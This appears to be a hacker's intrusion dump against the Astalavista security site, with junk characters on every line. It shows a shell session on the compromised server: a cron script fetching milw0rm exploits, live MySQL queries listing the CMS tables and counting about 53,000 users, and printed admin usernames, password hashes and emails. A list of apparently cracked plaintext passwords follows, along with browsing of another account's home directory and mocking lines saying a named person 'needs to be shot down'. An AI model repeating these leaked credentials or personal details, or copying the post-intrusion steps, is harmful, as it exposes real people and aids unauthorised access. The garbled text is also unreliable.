<description>All availably Exploits.</description>1 w' f: `6 D# j( ?' g4 c& x! T5 [3 A) g, U
<language>en-us</language>
6 l4 B* u* U/ n- E) a2 V <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
% }1 e8 F. J6 g; F8 u; l <docs>http://blogs.law.harvard.edu/tech/rss</docs>
* e6 C' K r# }% {% {( B0 g <generator>Astalavista.com</generator>
2 d8 Z' O- P- |0 W* u6 r. g <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
$ Q7 A* F' w' n1 ]7 K </channel>
% z9 M) B* x3 C S- L</rss>’;
+ Y9 ]5 `/ @! F0 N3 I6 A& C% Y6 s8 I' c+ X
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
( A# P! X6 a8 X unlink (FULLPATH . ‘/feed/exploits.xml’);
3 t- G2 g4 A; Q }
4 Z/ A7 e7 W( E' L- d3 T% q/ t
5 [+ c4 ~/ Z4 A3 c- h T file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);4 \3 T9 x3 b! Q( x3 V) B
[snip]
3 J+ I5 r# f$ I. ~7 y. p$ A4 K. O
sh-3.2$ cat exploits.sh
" f. L) } Q3 ^. R8 u$ y#!/bin/sh5 J' A, y/ h8 T. m
+ s6 v) U& D! q; w4 h
###########################################################
" _- g& y; I7 e' }, ]# #) r, u: i- Y" g
# Title: milw0rm exploits adder #
$ Q4 S! P+ w5 }& I& l; c# b) i+ x4 R# Description: Add all milw0rm exploits to the #
+ o, [0 z( P: T9 L& \- d# Astalavista.com database #! V3 \! @1 o7 J
# #
' ^' x. w; [7 l0 L, m Y4 K8 L# Company: Astalavista Group #% v# a6 |; B. E7 J( E
# Author: Paulo M. Santos #
+ o' P, D0 A1 F4 X5 E- P$ [2 |# E-Mail: 链接标记paulo.santos@astalavista.ch #
3 I8 G3 |# M, o" e# #
) O) E A- @7 z$ L! k0 W" z###########################################################! K8 Z# Z9 h) ]2 Z l
6 O; C- R0 `# y( t
# path P! j- Y7 M( G. U# E i9 b
this_path=/home/com/public_html/modifications/cronjobs4 ~ N& b- f0 Z- y% j% L3 M
3 D6 C! o: }" A
# change directory
: T5 c& L% f; m7 {, _cd $this_path; u: Y6 p7 w/ e
cd tmp/
) [! [' C: j1 _( F" }; r* `$ `+ P$ B- U
# delete files
1 P' Y* f) q' U8 L# U( k1 W) zrm -rf milw0rm.tar.* &
+ e# x0 R" d+ |! Z* \rm -rf milw0rm/ &
& @7 Q p w; N$ E: k( W0 {! C% i( _9 M+ r9 N$ m5 ~+ r
# wget milw0rm paket0 S9 S$ x( K6 _% x& z
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
7 r1 v" e6 w, }/ H; {/ m5 p; }% @3 M- N8 D7 Z4 g
# extract milw0rm paket8 R. s1 R, Y+ W$ z
tar -xvf milw0rm.tar.bz2' @( F+ V! b, l* f% J7 G
) I) S$ w* ~* W8 I
# change owner6 c& c3 `6 U1 n/ t' a
chown -R com .$ _$ Y; E# X, m+ f1 k; v; g2 M
chgrp -R com .
" G8 ~( A0 f7 m6 J, A3 L/ f" b+ w/ N f4 f9 ~' b
# execute php script
; M2 u1 r" q2 \& j& ucd $this_path
# [( E% I$ s4 E$ m: O+ i7 bphp -q exploits.php
, {0 X6 z6 Y+ ^4 \6 k% S2 f( m9 W$ w' j1 ?! E% P: h0 H
# delete files
3 C! R2 F2 ?$ |% krm -rf tmp/milw0rm.tar.*
8 P0 v; p5 \" n1 G O& krm -rf tmp/milw0rm/
+ A5 R. e2 H, V$ D+ _( M4 F4 o1 y4 G: v( g" _0 i3 |
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
% w# W0 L- S, n z) o" ^Paulo M. Santos needs to be shot down.! w0 W, z$ b; ?
( C9 Q4 I4 ^. v3 b' Vmysql -u contrexxuser2 -p
]- |9 t- o: l8 VEnter password:
# t+ h( {* |! u6 o$ O5 }* FWelcome to the MySQL monitor. Commands end with ; or \g.
0 k; ?3 ?. b+ a$ s0 R! EYour MySQL connection id is 261694
& `0 o4 \+ E8 F. Q' n8 `Server version: 5.0.45-community-log MySQL Community Edition (GPL)
' r2 N T# E/ _( Q: j- Z- v6 i+ h! U/ a/ |0 C% l
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; Y* u! D( f7 q, ^
7 J4 V& n1 V/ }/ v% ~5 ~1 ~$ F
mysql> show databases;4 _' p" p( F: }7 a; J
+——————–+
7 [1 Q% Q# {7 N. W. K7 l| Database |; M) N$ y8 x# [, v+ j
+——————–+
) K. r. Q7 Y0 \- y$ d) _8 R| information_schema |
4 j3 y) E1 l% @9 T) O1 g0 Z| com_contrexx2 |
+ f* Y: m6 Z! C0 c. Q H: z, k, Z8 ?( {| com_contrexx2_live |, c8 b. B3 T$ w/ Y' C* d
| test |
1 t' m1 q, C. V% E0 G: h( f# I+——————–+5 e: M4 j) v4 V( Y# N0 X6 r# @8 K
4 rows in set (0.00 sec)
3 N: j5 _6 u4 C* E+ F; Y8 h5 U/ K6 e# t
mysql> use com_contrexx2_live
6 `" {9 K% R2 s" iDatabase changed
8 m3 G! }7 E& ]2 j8 t- r/ emysql> show tables;& J) Z7 w. N6 z+ P: T* G
+————————————————–+
! u0 e2 n6 \# e: r Z0 v6 \| Tables_in_com_contrexx2_live |
; ` o/ I7 M8 C+————————————————–+
( n+ C8 G) E5 y1 w5 s( A| cc_banner_counter |+ _2 l# m& w1 |" B1 K+ Y% A1 c
| cc_search_counter |
7 p9 y9 U+ C" _( L| contrexx_access_group_dynamic_ids |$ Q F B e }9 ]
| contrexx_access_group_static_ids |
$ w: u, f; n1 G* H$ I- h1 n' O| contrexx_access_rel_user_group |# O8 p5 n/ `; ^( Z) j
| contrexx_access_settings |
5 R4 ?& d, L! z& K3 c| contrexx_access_user_attribute |) Y3 `1 S) h1 J" S4 n+ p6 w' I
| contrexx_access_user_attribute_name |: f" J7 @5 Z8 @$ x
| contrexx_access_user_attribute_value |
7 h9 d( d" E; X7 `6 B+ E8 s" y| contrexx_access_user_core_attribute |$ r h9 v, n0 i. {* N& j
| contrexx_access_user_groups |! g/ Q7 }% G7 ?+ J _7 j
| contrexx_access_user_mail |
" }% E, J/ D! {| contrexx_access_user_profile |3 @, d- f( ?0 B! W, p: W/ ]
| contrexx_access_user_title |
+ ?! d% F" s6 i& n| contrexx_access_user_validity |
# P) s, s9 j0 E C- P+ |8 || contrexx_access_users |
& `) s# u$ G* ^, X8 ~+ [ S" ^| contrexx_backend_areas |
5 l3 W, n2 i5 X. ]8 T2 P9 g$ H| contrexx_backups |' U4 a" g* c; p& {3 ~' z
| contrexx_content |. X( Y$ o9 q! q/ F% a/ G, s# s
| contrexx_content_history |) E" t4 g) D: V9 P* m+ L
| contrexx_content_logfile |
( l6 J! i' @1 T' ^* [| contrexx_content_navigation |
) S" `* Q+ V+ c# `5 i| contrexx_content_navigation_history | l/ W2 G6 L- o: U8 O: s# }
| contrexx_ids |
1 A% h. q, e0 Z* s+ Y# M g z5 H| contrexx_languages |
6 o+ _+ O' x6 ^3 p4 i5 ?) A| contrexx_lib_country |
, N' k0 \2 f7 B! Z/ a: X5 b| contrexx_log |1 f" a) `9 f# E* f
| contrexx_module_alias_source |" X K5 G$ S$ p8 f6 D; N+ u
| contrexx_module_alias_target |
) s, B- w. i, O+ ]4 b+ S& Q. w| contrexx_module_block_blocks |; M% X+ ?% L; D, m6 B6 T$ \1 _
| contrexx_module_block_rel_lang |2 h$ H$ Y1 L. S$ G
| contrexx_module_block_rel_pages | k4 C+ Z- M! P( @; |6 }- ^
| contrexx_module_block_settings |
# u2 ?: I; f/ S! ~/ c" D| contrexx_module_blog_categories |
# W; g. l, X2 K3 Q+ v| contrexx_module_blog_comments |! U- i9 n" [; m* G' n: ^0 o
| contrexx_module_blog_message_to_category |
4 W2 q# i* h! B5 V* H| contrexx_module_blog_messages |* r4 v- F) x& u
| contrexx_module_blog_messages_lang |
$ T8 }( {/ c, T( O: M0 u| contrexx_module_blog_networks |" S5 q8 `. t# O" f6 `" v3 C" J
| contrexx_module_blog_networks_lang |% L) ~& E6 C$ F
| contrexx_module_blog_settings |- F& r! J q9 g9 q
| contrexx_module_blog_votes |
) F5 n, r l& Q8 ?, W| contrexx_module_calendar |
; H2 K3 h; j ~, p5 w2 Z# Y| contrexx_module_calendar_access |" [; _9 H6 V( O" `* F
| contrexx_module_calendar_categories |/ |6 N2 U" ^% \
| contrexx_module_calendar_form_data |6 Q3 y I H1 j& y2 Q
| contrexx_module_calendar_form_fields |
* D7 W! Z. O0 M& M v4 T| contrexx_module_calendar_registrations |3 {" V. o Q% F' b4 M/ z2 Z
| contrexx_module_calendar_settings |
! z2 U Y/ F; |$ i! K5 ?| contrexx_module_calendar_style |) Q) c$ h. A' o0 B9 H
| contrexx_module_contact_form |
# `1 j' ]. b5 O5 i| contrexx_module_contact_form_data |/ _6 X. P" s; \+ H V
| contrexx_module_contact_form_field |. m0 W; m0 Z0 P5 z9 |
| contrexx_module_contact_settings |
0 I; j1 w. A) C0 S, [/ A| contrexx_module_data_categories |# a/ V; P3 ?# O% B- B
| contrexx_module_data_message_to_category |
$ l8 e2 {, t+ h+ ?| contrexx_module_data_messages |" S" U5 Q8 w% A. Z
| contrexx_module_data_messages_lang |. f# F7 Q5 _3 n
| contrexx_module_data_placeholders |
4 o" g7 f2 v1 D| contrexx_module_data_settings |6 G. `$ m X8 j1 Q C
| contrexx_module_directory_access |% G: [3 W7 K1 Y
| contrexx_module_directory_categories |
" m; z; e# `, ~| contrexx_module_directory_dir |
- U5 S. J" {+ s: m| contrexx_module_directory_inputfields |
) X( I" _# j# {| contrexx_module_directory_levels |
7 |# ^, d- M z; n| contrexx_module_directory_mail |
6 `6 ?7 Z3 r, j) c' Y! o% F| contrexx_module_directory_rel_dir_cat |
6 ]+ o! B9 F; s$ [' n| contrexx_module_directory_rel_dir_level |
# d& L4 x7 E, m2 [5 F- w3 w8 C7 Y| contrexx_module_directory_settings |: K7 N4 X! ~! j
| contrexx_module_directory_settings_google |5 W: h, O2 S, L: w7 D
| contrexx_module_directory_vote |
. u) ?! d3 t; u( l" `4 W& B| contrexx_module_docsys |* A( M! y2 k# l! \5 m
| contrexx_module_docsys_categories |' {$ _5 N9 d4 w* u
| contrexx_module_egov_configuration |% _3 O* h4 K* J: F, _
| contrexx_module_egov_orders |9 g# I. F, E6 J' G7 d+ h( h! {" R0 t
| contrexx_module_egov_product_calendar |6 j/ Z* R% Y" Z* W
| contrexx_module_egov_product_fields |
% S0 x, @- s5 z3 S, B+ `! C$ Y* J| contrexx_module_egov_products |8 T- l7 \* V5 T* F
| contrexx_module_egov_settings |% G2 @0 r" G+ ]) K
| contrexx_module_exploits |* N& q8 W! x o6 @/ U; N
| contrexx_module_exploits_categories |
3 {0 Q7 y- n$ E. C& @4 v| contrexx_module_feed_category |
6 k! l# Z1 m# K L/ k- K6 O+ T6 b( T3 ?| contrexx_module_feed_news |
- H- x2 f- n4 B" S; N- Y| contrexx_module_feed_newsml_association |0 O+ H3 r4 p& h7 d+ F
| contrexx_module_feed_newsml_categories |
/ R @( ?% F) z| contrexx_module_feed_newsml_documents | E7 q9 ?8 a0 K0 t+ r# K
| contrexx_module_feed_newsml_providers |+ h$ a7 O- h! ^7 ^2 r& c) N
| contrexx_module_forum_access |& ] h9 W9 H- L- _- \+ l( D5 {
| contrexx_module_forum_categories |9 T3 R' u$ Y7 u
| contrexx_module_forum_categories_lang |: N) J) J0 |7 r
| contrexx_module_forum_notification |4 U# h2 E( I6 L4 W* E" }0 O- G
| contrexx_module_forum_postings |" u; l9 N4 k. K/ y9 h$ N8 t& L
| contrexx_module_forum_rating |" o) b# R* v2 \2 S2 s% b
| contrexx_module_forum_settings |
! @$ C, _# {' r- d0 Z| contrexx_module_forum_statistics |3 b5 f' Y) j3 A" X
| contrexx_module_gallery_categories |
+ }4 k( c+ J# \* y/ ?| contrexx_module_gallery_comments |
, I" @! [$ K2 j, L% ~9 V| contrexx_module_gallery_language |( j( n4 F+ x# \' K' B8 b$ X+ i8 z5 X
| contrexx_module_gallery_language_pics |
6 k; L3 `' G& b4 g" ^) z" `3 u| contrexx_module_gallery_pictures |5 e' O$ `7 q: H
| contrexx_module_gallery_settings |1 t& I7 B- |! q7 p! O9 [2 B5 _
| contrexx_module_gallery_votes |
$ Z$ {: Y/ k4 Z2 @| contrexx_module_guestbook |
! s+ B7 T2 f9 N" n- `3 t m| contrexx_module_guestbook_settings |+ `8 n% T# M6 f8 u
| contrexx_module_livecam |5 s% n2 B; J' R, g& Z* a, _
| contrexx_module_livecam_settings |
5 f8 {% @8 G9 P- G5 ~| contrexx_module_market |
5 y/ N0 V1 `4 I( U+ C& P7 ~| contrexx_module_market_access |5 L/ d8 C0 }# s3 J
| contrexx_module_market_categories |; R- `* J: l8 D" U6 o/ q, u
| contrexx_module_market_mail |. u& A9 C/ g) M" D
| contrexx_module_market_paypal |8 O0 {% D5 c; I0 Y6 ^
| contrexx_module_market_settings |7 U* K7 |& O5 w: {* x: d
| contrexx_module_market_spez_fields |! }) {1 o1 W _0 ] S3 y9 E2 g. s( k/ f/ b
| contrexx_module_mediadir_access |
# s B0 \! ?/ o' b| contrexx_module_mediadir_categories |* ^, U# H9 e6 f9 o
| contrexx_module_mediadir_comments |7 {# A3 u& w8 G1 u
| contrexx_module_mediadir_dir |2 D; e: B0 M$ }4 P4 t- O& J" L
| contrexx_module_mediadir_inputfields |& T# w* V3 f4 e& x% `
| contrexx_module_mediadir_levels |+ w' P% I% Z0 b% a v7 ^+ Y+ [
| contrexx_module_mediadir_mail |! ~. l+ d! `& d
| contrexx_module_mediadir_rel_dir_cat |
2 O4 D0 Y! W1 N$ k3 |% ]; T+ A4 h| contrexx_module_mediadir_rel_dir_level |
0 T& {+ a1 l, n| contrexx_module_mediadir_reports |. ]1 o! F; ]+ |2 \; H$ x0 n1 p( x
| contrexx_module_mediadir_settings |0 b* D1 @" k0 d
| contrexx_module_mediadir_settings_google |! A3 V& s) m- e% [
| contrexx_module_mediadir_vote |& Y/ F0 q* w3 w) q: }! L/ j# b
| contrexx_module_memberdir_directories |
/ b \9 |# ^7 r: q" f+ K| contrexx_module_memberdir_name |
: }; u7 ^, _. k W/ ?1 U# d6 V| contrexx_module_memberdir_settings |( v, P. v+ i% Q* s' z4 C+ [2 y( R B
| contrexx_module_memberdir_values |8 p, j1 [) [0 o! P3 ], [' ~4 ~4 W2 C n
| contrexx_module_nettools_allowed_groups |+ [% h7 `6 R% m; f- A
| contrexx_module_nettools_settings |, v0 f; e4 Y/ u+ B$ w) h- d2 J
| contrexx_module_news |! j$ z4 a& J$ d" Q
| contrexx_module_news_access |. f; I! T" g: x+ T0 A/ d! B
| contrexx_module_news_categories |
$ y; N( b5 _. e5 ?) d| contrexx_module_news_settings |% |: h* t F+ [, a* a! `2 d6 V
| contrexx_module_news_teaser_frame |/ L ]& J' \3 p/ b3 W5 p, z
| contrexx_module_news_teaser_frame_templates |
/ t( j# o% Q9 e) G| contrexx_module_news_ticker |1 m; P0 A+ V( x7 {" z
| contrexx_module_newsletter |, ^$ q( p) {. s9 A+ J8 C
| contrexx_module_newsletter_attachment |0 U" S, M# m- Z1 S: ?! a8 [# K* M
| contrexx_module_newsletter_category |- ]" v# f4 ~8 X6 W' l7 x1 Y1 N
| contrexx_module_newsletter_confirm_mail |3 `' v4 p; a8 m I5 y, A
| contrexx_module_newsletter_rel_cat_news |
0 G; c ~% i; g| contrexx_module_newsletter_rel_user_cat |, Q6 O8 Y, v8 F: e2 X8 J
| contrexx_module_newsletter_settings |
9 ^. J+ b- W1 Y+ \& H2 t| contrexx_module_newsletter_template |; M k/ g) W- J" ^* Y
| contrexx_module_newsletter_tmp_sending |+ W; C$ G' V& t/ S6 O& ?
| contrexx_module_newsletter_user |: {; E- V( _" k% O& J- d
| contrexx_module_newsletter_user_title |
: F' X; w2 S8 [3 \- v+ V. C! U| contrexx_module_onlinetools_defaultports |
- U3 @/ k/ I( o) J7 |) t| contrexx_module_onlinetools_defaultports_back |
# }2 u; A, L) P! u+ {| contrexx_module_onlinetools_geolitecity_blocks |: y% g7 q, N, L1 R" W" O Y
| contrexx_module_onlinetools_geolitecity_country |
# B; }, ~' L4 ?| contrexx_module_onlinetools_geolitecity_location |
, `9 b& F3 k d4 R' `3 l- e2 y| contrexx_module_podcast_category |) ]( o g% Y: a4 M
| contrexx_module_podcast_medium |; m7 Y$ M* @* A
| contrexx_module_podcast_rel_category_lang |
' x, s i5 \% I- B6 p; B$ d# A| contrexx_module_podcast_rel_medium_category |1 {9 G5 x0 {1 y
| contrexx_module_podcast_settings |8 X8 }" D7 ~* u& A! v
| contrexx_module_podcast_template |% p2 g2 G" D2 x' x+ P" C( s
| contrexx_module_proxydb |2 a( n( A! {: h! L1 Z
| contrexx_module_recommend |
1 ?+ R( ]: A6 E. m| contrexx_module_repository |! ?' o5 d, t9 d. A4 o h
| contrexx_module_securitynews_cats |4 c1 P) U/ J+ \4 F
| contrexx_module_securitynews_feeds |6 w- {8 `: G* A1 t9 o
| contrexx_module_securitynews_news |
8 T8 S9 k5 f2 w| contrexx_module_shop_categories |
' I$ D6 }* T4 a' M+ h, t| contrexx_module_shop_config |
V% `7 l9 ]- g8 G| contrexx_module_shop_countries |$ @, t. d+ S6 F1 Z. N% D1 [
| contrexx_module_shop_currencies |
( N# @( D$ b: D0 `. w8 K a4 J| contrexx_module_shop_customers |
- p1 ]; _1 K9 v- I- Q3 || contrexx_module_shop_importimg |
( R. s/ O5 h- m5 Z| contrexx_module_shop_lsv |
( @- H; I8 r2 M5 i| contrexx_module_shop_mail |1 g+ U2 p! f. w* }* q" `1 d( m
| contrexx_module_shop_mail_content |/ {) h9 l% y, w( A" w( o) v
| contrexx_module_shop_manufacturer |
4 ~3 v: ?# K H: V6 j5 t| contrexx_module_shop_order_items |
/ U( F! w2 `( x. R! a$ Z| contrexx_module_shop_order_items_attributes |, a, ~" ?% y4 o( S1 d3 m
| contrexx_module_shop_orders |
. n! M# N4 y# s, P4 b9 F5 j7 B| contrexx_module_shop_payment |9 }" K: I; x/ r* r5 P
| contrexx_module_shop_payment_processors |
/ d3 n R3 P4 ?! G| contrexx_module_shop_pricelists |% @7 V! t1 _; L9 V" Y7 ?) ?
| contrexx_module_shop_products |3 S( R& \. c C
| contrexx_module_shop_products_attributes |
# E) @4 |* [% D; ]( e| contrexx_module_shop_products_attributes_name |7 ^/ }; j, K* K; z! g; O
| contrexx_module_shop_products_attributes_value |
G& U$ v+ }9 ^| contrexx_module_shop_products_downloads |1 [. A3 b. c% ?
| contrexx_module_shop_rel_countries |
1 x" y, U7 G8 v/ [| contrexx_module_shop_rel_payment |
3 {4 l) d, F/ V' b r| contrexx_module_shop_rel_shipment |
' R* G$ p) H. v+ A| contrexx_module_shop_shipment_cost |
( \0 |) z \$ b! \: ^| contrexx_module_shop_shipper |6 [1 v, }8 l! v' b) p; S
| contrexx_module_shop_vat |
3 G9 n$ E- y/ y9 o& m| contrexx_module_shop_zones |% E$ @0 h7 X, w& ^* u, I* t
| contrexx_module_u2u_address_list |7 j# Y* B5 m% {( n6 B% [
| contrexx_module_u2u_message_log |& m/ A E2 o4 D8 }
| contrexx_module_u2u_sent_messages |6 K" Z$ H+ i. _9 f
| contrexx_module_u2u_settings |! ]7 W d! t+ p$ L: J c- `
| contrexx_module_u2u_user_log |
2 K# x) Y! W, W0 `/ f| contrexx_modules |8 G& ~ A. ^1 N8 M
| contrexx_sessions |
$ x) g4 F8 r( e5 B# A& K+ k| contrexx_settings |7 i" k( i( n0 o; E8 g8 [
| contrexx_settings_smtp |) S/ ?9 a" r k& `" i3 B) S
| contrexx_skins |
! d" ^ H# \+ e; h5 g. {7 j| contrexx_stats_browser |
' b6 Y# R/ j+ X: Q; \| contrexx_stats_colourdepth |8 K- a! c: z7 h. h& l! ~8 \# H
| contrexx_stats_config |5 M4 I- Z4 K5 B0 j/ \4 A
| contrexx_stats_country |1 a( I* d0 |9 l s3 n
| contrexx_stats_hostname |
, T# R" K ` K; D| contrexx_stats_javascript |. k* E$ g$ }$ r* @' x
| contrexx_stats_operatingsystem |
' D- p" x4 l6 a% || contrexx_stats_referer |
; n" [5 @: D- a# V7 ?| contrexx_stats_requests |/ [6 a0 ]' q3 u' [/ _
| contrexx_stats_requests_summary |' {) g# `* `! g' U
| contrexx_stats_screenresolution |# e; k/ J* M( Q6 c% E7 x
| contrexx_stats_search |, Q+ y1 I+ w" N& F1 ^
| contrexx_stats_spiders |- D+ _% N- H7 t6 r6 J, g W0 z
| contrexx_stats_spiders_summary |5 L+ c; `( A9 c7 |/ B
| contrexx_stats_visitors |
1 x V" G/ O$ r| contrexx_stats_visitors_summary |( T, P0 ?( ^0 @7 S: Y
| contrexx_voting_additionaldata |
4 ?% t) `& Q* f. q: j" ?. B| contrexx_voting_email |
% P: l0 X! @# U$ _" j| contrexx_voting_rel_email_system |
6 ^8 [3 K( j) O% Y| contrexx_voting_results |! D4 t! r9 q; f8 P! q% a* N
| contrexx_voting_system |' X4 s( f* X9 v4 ]7 B" a
| foo |
/ A5 \0 E3 n) P' w' l6 S4 @' t+————————————————–+: A' S, x" D- R8 j. q: q
227 rows in set (0.01 sec). L/ N2 Y$ S3 [# b; M) J% |, v3 Y
1 p$ Y: ?0 y. g
mysql> select count(*) as skids from contrexx_access_users;
l& J& |9 i7 q1 L) X+——-+
9 Y" \0 M* C( ^3 S| skids |4 H1 M- ~, Y; r
+——-+
6 w( I& F/ e1 d5 k! \/ o6 H% D| 53699 |
$ Z/ b1 f8 l, X! H9 L6 V+——-+
w) L5 h/ q8 M6 K2 k8 f; l1 row in set (0.00 sec)
' Y" C/ D( k4 Z( f" I& I) a9 F- r: j. r( `6 t
mysql> describe contrexx_access_users;
/ r& r3 E0 T0 }, z% Y0 H: r+——————+——————————————+——+—–+————–+—————-+
/ a1 h% E9 U, z8 D9 l| Field | Type | Null | Key | Default | Extra |
6 p$ d4 H" s& I; H8 s/ c+——————+——————————————+——+—–+————–+—————-+* q: V, o( q5 M' o0 K1 B
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |! T; `1 F5 u0 n3 N' |
| is_admin | tinyint(1) unsigned | NO | | 0 | |, C0 v6 K4 l+ ]' e
| username | varchar(40) | YES | MUL | NULL | |
* Z7 Y5 A- H% ~* Y3 J1 d- c| password | varchar(32) | YES | | NULL | |
0 p+ [0 H4 ]+ ]8 }. y; R" \| regdate | int(14) unsigned | NO | | 0 | |
2 I. B- W, ~' w5 a& b| expiration | int(14) unsigned | NO | | 0 | |; Z. c. ?. S$ i8 I6 X' J
| validity | int(10) unsigned | NO | | 0 | |
+ Q8 E+ Y D% G1 m2 y| last_auth | int(14) unsigned | NO | | 0 | |
2 P, Q* U7 V3 Y5 I! T5 Q( S7 q| last_activity | int(14) unsigned | NO | | 0 | |) m- T; }% j5 `4 M) F
| email | varchar(255) | YES | | NULL | |. O5 k* | {8 R: e0 ~* K$ ~
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
$ x" Y* v# Z5 q' Q| frontend_lang_id | int(2) unsigned | NO | | 0 | |+ O* x& w x) g0 v ]% f. E
| backend_lang_id | int(2) unsigned | NO | | 0 | |
- y$ Y+ a4 s5 x# d9 O| active | tinyint(1) | NO | | 0 | |
y g3 M7 N& M| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |) P; l+ u: O ^, | N* y* x2 M0 f
| restore_key | varchar(32) | NO | | | |- O' n+ |- m4 U/ c7 {
| restore_key_time | int(14) unsigned | NO | | 0 | |( T6 H. F4 d$ _# I1 L2 p
| u2u_active | enum(’0′,’1′) | NO | | 1 | |! p2 d$ r9 |* i( j' J$ p7 Y
+——————+——————————————+——+—–+————–+—————-+
9 P* O- S% ~% X) B/ |$ s18 rows in set (0.00 sec)4 O# b0 ^' j/ A7 W4 r' M
# h5 M {% q5 M2 b# q9 p# ~mysql> select username,password,email from contrexx_access_users where is_admin = 1;
8 J& G$ m4 u+ A( x7 c- S+————+———————————-+—————————–+
# g2 }8 \. }3 F% {6 O2 \| username | password | email |
# D1 Z( |& _1 X8 I0 N- L3 w: X+————+———————————-+—————————–+- b7 N& c8 K( j. T+ I
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |" R9 @3 W9 H' f' p! @" \. n# U2 W
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
G- q$ l% B4 k7 o2 h( M& W| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
, T- b: }# H) Q; ]" C| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |$ i- e' ^2 N# T t w
+————+———————————-+—————————–+, D* ]' E; B2 L4 f
4 rows in set (0.04 sec)
& l4 ?: m" c. ?/ o; l5 X- B$ y& z
; X5 Z8 x2 T0 O4 }. H4 hmysql> exit;
/ `: |9 L7 e4 Q* I2 {; f8 X, _6 BBye
9 t3 q$ ~. a" H2 B, m1 M9 [
5 a% d8 A+ q' M[~] There you go, your “team of security and IT professionals” is a joke.
/ u7 m7 H! e9 k- B. y. w5 `3 o8 S7 ~. ?: _. N4 |
+——————————+
' ] F) I$ `# j6 Lsystem:f82BN3+_*+ h. D. ~1 |% z( |5 {6 V/ [
Be1er0ph0r:belerophor4astacom9 [/ S- o/ ~) \" J; S
prozac:asta4cms! m3 l" A5 }6 Y9 t1 E
commander:mpbdaagf6m$ t# m5 K6 d; J3 q) L P; I
sykadul:ak29eral- R$ F( U7 u" G9 J$ L5 S+ v7 y T! X
+——————————+
2 \6 E6 a# ]2 g" k. i' {
2 V7 g4 @) v6 [* a {1 Z[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ B3 }( d3 b" |
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.) a1 t- x$ n, |# E- c
. E4 T+ m# ?6 e9 V9 n- `- y
[~] Lets move to astalavista.net now,
, H* P1 B9 v0 X3 s/ T, c2 {/ s; k- x. Q5 V2 l9 v$ Q
From <链接标记[url]https://www.astalavista.net/[/url]>:
+ a" U: o, ^4 @; O7 ~+ W>> Everyone knows that the best defense is a good offense.9 A" f2 ]1 a7 p: Z0 z+ C7 ~" t7 m
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.5 j& d; e, d0 A# u; k- g& T. r
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
: U/ E* J- n: M3 M$ ?$ Z>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”4 d* Q, q4 {5 L0 H0 s8 B& ~7 r$ H E7 G
: f- I! Y! x j" ~9 b) T4 z' p>> Go ahead, try and hack our server . in a completely legal way!7 j5 t6 J, T: N; _
>> Learn by doing: We offer our members tricky tasks and challenges on an* W4 A9 c) G: K% |0 a6 [* j$ A
>> ongoing basis so you can test your knowledge and abilities. You can also
; u9 ]2 V' Q( Q; _9 P>> demonstrate what you.ve mastered by taking part in regular hacker contests
# s0 z! P- I! [>> and war games$ u3 {5 z5 P6 ]
4 T( K3 E2 Y) j( j[~] Lets take a look there, after all… they are hack-proof, aren’t they?!% j$ ~. ~; n. `, Y% a0 t
. n% m. e O2 g+ N a/ e[-] Tricky task: Find home dir of astalavista.net1 P$ G. q$ Y; @/ h& w
, k. n4 N U2 ?8 A h% y9 y' x, Z& R% |1 ksh-3.2$ ls -la ~astanet
& ~" H' S* W3 ^6 x, E! q4 q1 ototal 48& ^2 I% |% k) Z* k+ j7 D `- \0 a% m
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .& g a3 [4 U2 t. r" B2 v+ V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' R- M& {+ Q) _2 f D5 q& [7 a
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
: H: i1 Q8 j- v- w. q0 \-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
' x/ @) w8 Z0 @% b* M1 i- O* Q' V-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout& L' X) K$ g1 ~7 Z$ i- r# E2 f2 v# m
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile+ G& S0 B- B: W# E8 o
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) o7 ~7 U4 q) @% F, f: `# Q
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains X; ~# o4 z( K9 T6 L
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" }$ Y( s/ c4 L7 k$ ^drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail1 o7 N7 b1 a" Y
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html3 V: {7 o2 |/ o6 ^' ?* c8 v7 L
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ [# Z$ q$ U- F- u. o) `* I9 D2 p/ z1 H
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/5 _9 v3 J; o3 \- b% d. Z- N
sh-3.2$ ls -la
6 @' X6 N) Y/ @% H6 Qtotal 200
' z" D' u, w- O2 L5 I* Ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .; i$ Y; p6 i& N+ I. Q
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..& v( y5 b2 K. ]7 K
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
